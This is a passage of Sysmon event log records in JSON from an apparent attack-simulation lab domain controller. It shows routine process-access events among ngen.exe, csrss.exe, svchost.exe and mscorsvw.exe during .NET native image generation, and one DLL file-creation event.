\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7834,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:38.569\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2256-5F25-0000-00101B990D00}\r\nTargetProcessId: 2608\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:38.569","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2256-5F25-0000-00101B990D00}","TargetProcessId":"2608","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7835,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:38.569\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2256-5F25-0000-00101B990D00}\r\nTargetProcessId: 2608\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:38.569","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2256-5F25-0000-00101B990D00}","TargetProcessId":"2608","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7836,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:38.600\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2255-5F25-0000-0010998F0D00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:38.600","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2255-5F25-0000-0010998F0D00}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7837,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:38.600\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2255-5F25-0000-0010998F0D00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:38.600","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2255-5F25-0000-0010998F0D00}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7838,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:38.615\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228E-5F25-0000-00109E4A0F00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:38.615","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228E-5F25-0000-00109E4A0F00}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7839,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:38.647\r\nProcessGuid: {41C8662E-228E-5F25-0000-00109E4A0F00}\r\nProcessId: 4700\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\125c-0\\System.IO.Compression.FileSystem.dll\r\nCreationUtcTime: 2020-08-01 08:06:38.647","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:38.647","ProcessGuid":"{41C8662E-228E-5F25-0000-00109E4A0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\125c-0\\System.IO.Compression.FileSystem.dll","CreationUtcTime":"2020-08-01 08:06:38.647","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7840,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:38.678\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228E-5F25-0000-0010DF4D0F00}\r\nTargetProcessId: 892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:38.678","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228E-5F25-0000-0010DF4D0F00}","TargetProcessId":"892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7841,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:38.678\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228E-5F25-0000-0010DF4D0F00}\r\nTargetProcessId: 892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:38.678","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228E-5F25-0000-0010DF4D0F00}","TargetProcessId":"892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7842,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:38.694\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228E-5F25-0000-0010DF4D0F00}\r\nTargetProcessId: 892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:38.694","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228E-5F25-0000-0010DF4D0F00}","TargetProcessId":"892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
